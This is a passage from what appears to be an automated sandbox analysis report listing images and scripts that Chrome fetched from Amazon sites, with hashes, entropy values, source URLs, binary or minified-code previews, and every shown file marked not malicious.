                                                                                                                                                                                                                                                                      SHA-512:C39BFDDF64F3EBB16AF0BB13A23B15B1253C8E1578663A992C4873F4CE471BD785DF86E52F5161ED4C7D779018B341432B9679A03050DD3FF4E02E4A07B4C9B9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1.........................................................................................................................................................................................................k..'.}9.............}.|......}~|.._. .....'....G.g.'............}.|w.b......g.W..a..........<......@.3...:A.I0....=.&..D...D...$.........G4.L...jsZt..4..,..W..._.....+.fY.0zd>X...$XV...."n...... s..../Uv..x.W]Sb...^6.p..`...5.5.6.}.._Ci2..-O...9..M.....u.t.q..*.o...G.4.....,G..."n...... s...AU.T._.Z.r...r ..Mf....!.u..Y.>...:]Y0...,.....v.%.78.ZG....I.dJ{.....|..M..p........@.`.....{.^K:......I..6.:w.eC....^...x....C.d._..38F.*.a...w..d...s.G........:<..."X..b.`..&........<..(.ri.........p..b.{.Fs..[.e..U1.M1.E,..|.^iB..].p...A.v.-.+.x...p..j......W............ g.<.m.*..Y..[.^...."5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (582)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):21859
                                                                                                                                                                                                                                                                      Entropy (8bit):5.2813610728948435
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:q4lRe4Tkiep43TsqMQCCYnf5NhE7mlkGWJ1vF2cq/cseGp5aBfaZYjMgctFF:3443sqMQCdnf5NW7mnWJ1pq/d5aaYjMf
                                                                                                                                                                                                                                                                      MD5:525AAAA44C9029AD136CCF501E7AF292
                                                                                                                                                                                                                                                                      SHA1:74DC413F3074E51D29454A3C796825818ADE09AA
                                                                                                                                                                                                                                                                      SHA-256:12984FEA3A55815160E8DA89604A431BBB597E577B07594D9F2BBDEEFEB1B760
                                                                                                                                                                                                                                                                      SHA-512:0EC4B3850A771420DFC84D6A24EE638C875E6DED21BE21C7372D6D2B4960309D3452A3E845FB13C962ED58B906B063EA310C7B99E804DCC5F81CE297473C8378
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(k){var p=window.AmazonUIPageJS||window.P,q=p._namespace||p.attributeErrors,c=q?q("AmazonRushFramework","AmazonRush"):p;c.guardFatal?c.guardFatal(k)(c,window):c.execute(function(){k(c,window)})})(function(k,p,q){k.when("a-ajax","a-util","3p-promise","rush-asset-loader","rush-util","rush-metrics-adapter","rush-dispatcher").register("rush-ajax-controller",function(c,g,e,h,b,f,a){function d(a,d){if(!a)throw Error(d);}function u(){}function l(b,c){var f=b[0];b=b[1]||{};d(v(f),"`dispatch` chunk must have a name");.a.trigger(f,{data:b,memo:c});return e.resolve({name:f,payload:b,memo:c})}function r(a,d,b){var c=a[0];if("title"===c)document.title=a[1];else if("dispatch"===c){var f=l(a.slice(1),b);f.then(function(a){d(a.name,a.payload,a.memo)})}else d(a,b),f=e.resolve();return f}var m=g.extend,x=b.isFunction,v=b.isNotBlank;return function(a,b){var f=[];var g=b&&b.success||u;var l=b&&b.error||u;var n=b&&b.chunk||u;d(x(g),"`success` must be a function");d(x(l),"`error` must be a function
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):12571
                                                                                                                                                                                                                                                                      Entropy (8bit):7.918578056569039
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:YQxx2We9K0yhkAnzHpWbO2JRKLQSW0jJqSau4ehf02tTC/C7zx6uX5ztCe8GBS:LPYK0u7dJQJ0Lau4eh82tAAxBzoGBS
                                                                                                                                                                                                                                                                      MD5:3AC30A09C64477A1A143D9455417C38E
                                                                                                                                                                                                                                                                      SHA1:F53FBAC6BDC74E2B7E305A97719B27E64CCB5AA0
                                                                                                                                                                                                                                                                      SHA-256:45C9BD5EFB1C71BAA1F55B6E32EBF3A39CD989E16C01C6EDA0D3D7DDF125D229
                                                                                                                                                                                                                                                                      SHA-512:E035510CB2E1CDDBA293F537A48751039B74E0BD03B0290DD495420D58FB6A584A2632B59AA2682C691FEA9C899AE21E251A24709A787C5B4C0677E93E590D37
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259754_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........2............................................................................:..L..S.1h...c7.............5.|.m.jq.oW..p....gkQ5......l..l.O ........W..uZ~r............k.z...+.5a.P............F..E...........I.M...zx.....?T>~.a0.#N.{.<z.n.q1..M1..d.a....kbcc...S....6..o3k.<5..hH.$..s}.O...._[.i.:...]cW.__.:{9..N..>....;8x..A..:-jOE.z.....<..g..Q?g.._.2...}g....$.W.o...E.nh....U.T{g....a....T.|.g......Ml.@...x..7&;.\7..........!.1..l.n...[........t6s.....~.#.P..S.S{g.....o.....x.{IN.^.'+..T....Vw.".0.<B=..[.>.v........g.....O #.-.2t..H.......42....._d.....<.....P'......k.....Gu........wX+p..=.7o..k..z..;..`..OqQ....9.....I..%...*.Y..[.4..2..>..e...........X+p......N.z<...=).........>y......B...00...0......"5...}r..............U.S....H...UkU..;..y.~3._0.`a..>F..X.s.E.2.>..\...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon-adsystem.com/e/loi/imp?b=JHmX5NPJ7V2JK051HMLo-qcAAAGRdjLk1wMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICCwJel0
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4095
                                                                                                                                                                                                                                                                      Entropy (8bit):7.743327463635847
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:tUZqdvEba+kHCIjOTNa09i6Gw5q4fZI0fQqfD/KggfLbg3:aZqdvSarHCI2Na8X5q4hhb/wfLO
                                                                                                                                                                                                                                                                      MD5:9DD28A07312AC0BE48AF4F1819E9DDF0
                                                                                                                                                                                                                                                                      SHA1:FEE2552A4D89C7138F0F1995012F6C32B2FFF5C5
                                                                                                                                                                                                                                                                      SHA-256:F7D82D684B552273A06E2FB456D05F0ADC4A7873E3AF2EA07D930223280ADAB0
                                                                                                                                                                                                                                                                      SHA-512:618B09AB91B216E6128E15AE95268816F8BFC5ED7D2DD253C976A91476926D1767A3BA82FEF635ADF79FFDBEF2FD4C0EA95826FEBFBC8DD30197345F964D9E79
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........:.......................................................................................1...z....l.6..h%8.Tv.L...lL..e..r=.J......<C.<)X...X.{."7..=..E..............E....a.D..E...L}..D...q.u........;1V.G.....-L/.8o...?...R..jF.v.............mhkt...A.6.b...^."]".........J......q........i.Y~...ZL.K@....j{Uo..D.........#..@..............H........................4...$.3@..#%ST.....!"5CDQUt...&APdesu 1Ec.............?....H...+..g...s.#.,E..\..3.w...N..4.'.T...%8.D..iu..7..`l>.\.1...-|.'.L..L...NG....|,S....N.Jl..9...X.uK.J....b..('.Xy....~.%...$....1 ..)P..!,[..'.......[l..\.*~aAwc>Zs...._.n...7..=...f.O...ng...3.F.^W..n..|...<R.?....Kl..`.......nI..........Gr=...+|.S.N.U.c.....j...x..t..D.{.~.k...<.......'x.....E..P...... ....{.]8...n@I%j......< ....BI...(S.G..E._q..m.?/QS...n.W
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4937
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9116381578289445
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:7lDZLsyyesngEW5sK0Onmo7yaw/47GC8EU4CYKKRAjhzVYf:fC9/WiKfP7X/SZ9zVg
                                                                                                                                                                                                                                                                      MD5:C0091C4CCA8AF9F02E1CD4AA779B82BF
                                                                                                                                                                                                                                                                      SHA1:3F4D5AA76E6FEAC6AD4C5BFAD438456408C9594D
                                                                                                                                                                                                                                                                      SHA-256:B08C1A511006AE508E725F09F650497B566DF9D9D92ACEFB6F1F1084BB7ECD8B
                                                                                                                                                                                                                                                                      SHA-512:6DF165A8B4439DEFE23BFA8C7AA346227BBC0A88E13C80EBE694B95E352A5F6135034C2362AAFAC1F980B7BD10385E749BECB9AE1207FD345CA6195372916053
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t....".................................................................!1."A.2Q...BTa.#qr...$4RSb......35Dst.......................................................!1A...."2Qa.....Bq....#br..............?...R.._;JR..v+-.p...+.ius.Z..."...J...n~.;V8.......uq.v.z.MF~.<.l..#..CQ.E..K..N5...Y.....>..~.;T6.c..3.N.X...Ae....[-.6.X.7n..i.aC.M....c..Z... <l:.-)rNV..l...q..z7U.Q.\7?uO.........j.q..e....{I.iT..K...r..8.]..iw.o..l$K..q.!6.:.2....^?.....9.g....7...I.#*68..8......~~.n~.;S....F....Ce.ua$...")D.p...z....S..{ngI.....w.'p.....3...R.c6...[...BL...F..M..m..........;S....5N..q.V.Vm#g.5...K...Hb.3.zu..]..{.:TH...T..$..G.H.....?.V.W.kAuM....EKr.Ys..Eq.'..<..W....>..~....T...W.%.3.D+3.Pe.".nr2.x#.4...R........Y$..w.........1..}f.GE}VK..........H..H....p\...?.......Y..[.<9,..q...ege.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (574)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5749
                                                                                                                                                                                                                                                                      Entropy (8bit):5.235668032462024
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:dqUhTMvW3qbDkvUaTyTwsN7N7PWX0zmei2NeNeYzeie1eGnUYtVwJVKx:dqmMvWankvUUyTws7N7e2TiFYY6vwGnT
                                                                                                                                                                                                                                                                      MD5:41619C38B3C06B8A6C0F3D86CF64CEF5
                                                                                                                                                                                                                                                                      SHA1:4B655456A08C148B46F8FD29517D595F2F720320
                                                                                                                                                                                                                                                                      SHA-256:0A46C96881D5886EC3F902A00750F6F28A8262FFA2A16C43EB67D8F5D2683C57
                                                                                                                                                                                                                                                                      SHA-512:EF42075340710D7B37FA4C4F9019EF1912AF412CE4398AE010B573B9AA1D42C2EA634AF96628C9F0FDB90082418DA556DAAD8CEF8FFE18B4794DC52D222B48DF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/21cuxCuJB9L.js?AUIClients/AmazonRushRouter
                                                                                                                                                                                                                                                                      Preview:(function(g){var f=window.AmazonUIPageJS||window.P,r=f._namespace||f.attributeErrors,e=r?r("AmazonRushRouter",""):f;e.guardFatal?e.guardFatal(g)(e,window):e.execute(function(){g(e,window)})})(function(g,f,r){g.when("A").register("rush-routable-application-base",function(e){return e.createClass({init:function(c){this.applicationName=c},name:function(){return this.applicationName},unload:function(){return{}},load:function(){return!0}})});"use strict";g.when("A").register("rush-router-html5-history-support",.function(e){var c=e.$.extend,n=/OS ([0-9]+)(?:_([0-9]+))?/,g=/Android ([0-9]+)(?:\.([0-9]+))?/,h=/iPhone|iPad|iPod/;return function(e){function b(a,b,d){b=d.match(b);return{major:a&&b&&b[1]?parseInt(b[1],10):-1,minor:a&&b&&b[2]?parseInt(b[2],10):-1}}function p(a){if(!a||!a.url&&!a.state)return!1;d.replaceState(c({},d.state(),a.state),d.title(),a.url);return!0}var d=e||{userAgent:f.navigator.userAgent,pushState:function(a,b,d){f.history.pushState(a,b,d)},replaceState:function(a,b,d){f.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11226
                                                                                                                                                                                                                                                                      Entropy (8bit):7.889421574582735
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Y+xdKDWtCYFghY0PrSKrIdwLSAOP82dRiuTxs70FxHXwCM42DbTymm9kZ:fYxYFghb7JOPjXin70fHg7DCkZ
                                                                                                                                                                                                                                                                      MD5:B71C330DA7B832FEDD32EE894DA6359D
                                                                                                                                                                                                                                                                      SHA1:C406DA2D0920291CA6AAD71E9CE98D1092C3259B
                                                                                                                                                                                                                                                                      SHA-256:6832010C124A2842EBB2439CC06E2379EBB86EF536952CF16D5B9F1A664592F4
                                                                                                                                                                                                                                                                      SHA-512:06148C320B3C7FE6C27A2D383850D2FEE9AB92593EE94F81545B831F083C4FC79942A63275DD80785295D1BB7E6A3868D6A1F5441251A387B8289B50548A807B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................x).}W.op.D..hOjl<...............z.}m.j|.oW........kQ5.....R.w.:r.........}o.U..]..@.......oZ.v..+.5a.P.......4|.K.b.B,...........Mzl...t.......G..>..a."...gB..\8x...<N3^..C9..>o.......\u.....hH.$..y...@...}o..`..,......=~Xc.>.zy....>Z..0...&...^...).......I.P......E.nh..C..........t..O..Z.#g...j.m..-U..W..............s{.{.........0.....?F..p....,0.{*.m.)r....S...k......j....H.......Ku............. ....i.N.WwKN,..4lC.3.c..p.&..]TG;.g^....S.U.Jt.T.5~.N.....{..v..X.~x....;..........e.F.?..3Z+./".8oy.95a...q.>..5.e......Y.2%.E1.u.].`S......k.........L0z....p\.gO...Z..-...N...P.1.=...qY..hp^.8.......p8..o&...C...N.........)WiO[.^......>w.......#..^x.H....Ev.Z..umq.G..5.#...%..8.g..:.u..}........|.5.4N.....1
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):150465
                                                                                                                                                                                                                                                                      Entropy (8bit):7.743263701962922
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:43Ocg0nc9WBK7vtY9EDWVuQT4xL+BIRX1FBoZtgq/YuhhJrbV:ncg0nHWvC54xLBRlvQr/f/rZ
                                                                                                                                                                                                                                                                      MD5:88B3C2911073DF4DA51BC69DA8596761
                                                                                                                                                                                                                                                                      SHA1:ADC57BA68A6E056B0979FC5D7AF105491AEA2005
                                                                                                                                                                                                                                                                      SHA-256:E0EFD5DD02CEF246FC8CCA2574B2F6912473DAC99997A141E3FCA08D7BEA103C
                                                                                                                                                                                                                                                                      SHA-512:AF6BCE5549201FC203FD60D4066A4D774898A3F6D517D7D41E4C952D27866521BC68DDC3D3786D786A01C4AB653A3C69160C58EE1D2C0692AEE457ADC69936CB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):285
                                                                                                                                                                                                                                                                      Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                      MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                      SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                      SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                      SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/01/msa/vowels/metrics.jpg?time=1724264968409&rand=99848
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 362x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):14392
                                                                                                                                                                                                                                                                      Entropy (8bit):7.949674498179065
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:c3aycou3GdK/08dGRX7WhdM7YBcwSEIKLEj:WaedM08daXSErwSRtj
                                                                                                                                                                                                                                                                      MD5:B665542443219762C7D2A8D000F98C48
                                                                                                                                                                                                                                                                      SHA1:C455ACEA42F8A7D920375005E1478D99321708D7
                                                                                                                                                                                                                                                                      SHA-256:ED805847C421461848FEB80B818C4C0DF5E5620CC45405B370F78457DF49CD83
                                                                                                                                                                                                                                                                      SHA-512:2510EB715A958EDA19231E6309C0FFEEB7B1CCDE9679792B5AEAD46DDFD329E94BAE951A7229A5DBC87E108398007D726930195F9CCD1958E9EC3FECD1C6FC47
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/611TWGHXWyL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........j.."..........1.................................................................'.R......d.%~......uW)...X........................ J.=.%...'...E...7.]i.7.9.^..<s%....$.A....}...................b+.}<$..:$...=.(.......a.....ud..<.X(K.P..............G.Z.#...n.UWl>...l.P......&f.N......s..s.Q$}F... .............C.U.FY..O<:BF.....D....vd.d.L.D.+ Mb..\..U..o.l7-..T.4....8.L.J.:.d..#A..[\...)..=....Q..J.kc..;.v3M..../8"J.#.X.{EW.......N...8...1....C.^fQI....v.`..Li......=...b`Yg.Y.y.*.Z).f.Sd.>_R.7.@.F.`)......@..c...R.@+.+[DF.n..;..I..M.g..R.t.'a.#m..G.....Z...o..X........g..).-.)........T...w..'Ass.Ag<So..........?H.Y...8O.j.:V.Z..}..Yw..^....]E`kE..X.k4..(...6..!.v.F..A.....VU.;.G...G+6..B.T.~..~%.gI....I......'^}k6....OT9j?..X.......R...."Wj.h....V..g...}.=>y+.i...}.......G....jMf.Q.....}>.T..e5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (48840)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):48888
                                                                                                                                                                                                                                                                      Entropy (8bit):5.316989310603465
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1t0pkZtsaOoGHKsN3+xmxbQGdDYOeSYNkBc7J1VQzqr+JkqR6VhkPlN8Opgydi20:1t0ODIN/EOgJ1VQHZR6VO9N8OKydnpEj
                                                                                                                                                                                                                                                                      MD5:54586B09CF42FDBC1BC3F8D144A9C9CE
                                                                                                                                                                                                                                                                      SHA1:8792BBE8179A6965653EF878554BCF90C3807A3B
                                                                                                                                                                                                                                                                      SHA-256:A67E8235A7759CE78E2B5D3F145CFB07665F37F1257D1C8B80EB0136E1DD7784
                                                                                                                                                                                                                                                                      SHA-512:75F28B09EF56BBCCA53E66963F6DF228E284A2604A0692939838F0989A51B14DB0C49B1EA92E306B43DCD2AAD83E5ACD0CF427973C5F20074FEDCBBF0F564A64
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame
                                                                                                                                                                                                                                                                      Preview:(()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(window.location.href,t)}return n.get(window.location.href)},o=function(e){var t=a();if(!e||!t)return null;var i=e.split(":");return i.splice(i.length-1,0,t),i.join(":")},s=function(e){var t=a();return t?"".concat(e,":").concat(t):null},r={wb:"ues",bb:"uet",af:"uet",cf:"uet",be:"uet",ld:"uex"},d=function(e){var i,n,a=e.latencyEvent,r=e.scope,d=e.placement,p=e.timestamp;l(a)&&(c(a,m(r),d.id,p),c(a,m(r),t(d.name),p),c(a,m(r),null!==(i=o(d.name))&&void 0!==i?i:void 0,p),c(a,m(r),null!==(n=s(d.id))&&void 0!==n?n:void 0,p))},l=function(e){return"function"==typeof window[r[e]]},c=function(e,t,i,n){void 0===n&&(n=new Date);var a=r[e];i&&"function"==typeof window[a]&&window[a](e,t+i,{wb:1},n)},m=function(e){return"adplacements:"+p(e)},p=functio
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (10372)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10450
                                                                                                                                                                                                                                                                      Entropy (8bit):5.228070049895735
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Vb3JVaxC6DPmXsCXMdc1OdVLWRiJsNbKE08S12L1NOi:VLIC6De8RdVaRxNIoL1NOi
                                                                                                                                                                                                                                                                      MD5:74E590D62AE72E7CFE03C4EE6BD4EA5E
                                                                                                                                                                                                                                                                      SHA1:A0E05FE40A6233D78162A96EFDFD14077F1C6283
                                                                                                                                                                                                                                                                      SHA-256:50994C0128B4438C67A104BB948C40681FC8199B1A42FC48FC75BA5E6F814793
                                                                                                                                                                                                                                                                      SHA-512:D8AE8D4527D9286FC97CEA6A421547C6EEA20DB1BB9192F7FF6F36713689EF54A747333C343C825A56235ABBEF0827F2C0E693244C7F150D8CA7B330C145EB12
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:/*! For license information please see react.production.min.js.LICENSE.txt */.!function(){"use strict";var e,t;e=this,t=function(e){function t(e,t,n){this.props=e,this.context=t,this.refs=L,this.updater=n||T}function n(){}function r(e,t,n){this.props=e,this.context=t,this.refs=L,this.updater=n||T}function o(e,t,n){var r,o={},u=null,a=null;if(null!=t)for(r in void 0!==t.ref&&(a=t.ref),void 0!==t.key&&(u=""+t.key),t)D.call(t,r)&&!V.hasOwnProperty(r)&&(o[r]=t[r]);var i=arguments.length-2;if(1===i)o.children=n;else if(1<i){for(var l=Array(i),c=0;c<i;c++)l[c]=arguments[c+2];o.children=l}if(e&&e.defaultProps)for(r in i=e.defaultProps)void 0===o[r]&&(o[r]=i[r]);return{$$typeof:g,type:e,key:u,ref:a,props:o,_owner:U.current}}function u(e){return"object"==typeof e&&null!==e&&e.$$typeof===g}function a(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+e.replace(/[=:]/g,(function(e){return t[e]}))}(""+e.key):t.toString(36)}function i(e,t,n,r,o){var
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):50614
                                                                                                                                                                                                                                                                      Entropy (8bit):7.947100794600626
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:oa0dExo8EX2tOyI2AgTyEWFFFFFFFekkhkk4NV9f5LEJ:T0dVNgO4ryHpoJ
                                                                                                                                                                                                                                                                      MD5:9F0F5D95B1D863F2237F341A394B7A25
                                                                                                                                                                                                                                                                      SHA1:DCA440EF90B5E58901EF10FED62BA851315E2F91
                                                                                                                                                                                                                                                                      SHA-256:A004F5B4D0FC51606C9F2286BA0FE7A66DDD9D9A971F0E6D840F361C07DAB34F
                                                                                                                                                                                                                                                                      SHA-512:EEA00FED9D58034B6E1A047FDA634BD1ADBF61E6A0ED1397FA420E66B27441756BD1E0384352EB8B21BE9FAFDB2C1A644355800B6A3F4FBC8BD12C723A8C962F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-shalimar_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................H..............................!..QT.."1A...#.2aqr.$3....%....4BDRb.......................................E.............................!1.A."Q2aq...#$..BCR..34br......'S................?..C..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.e9..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:dropped
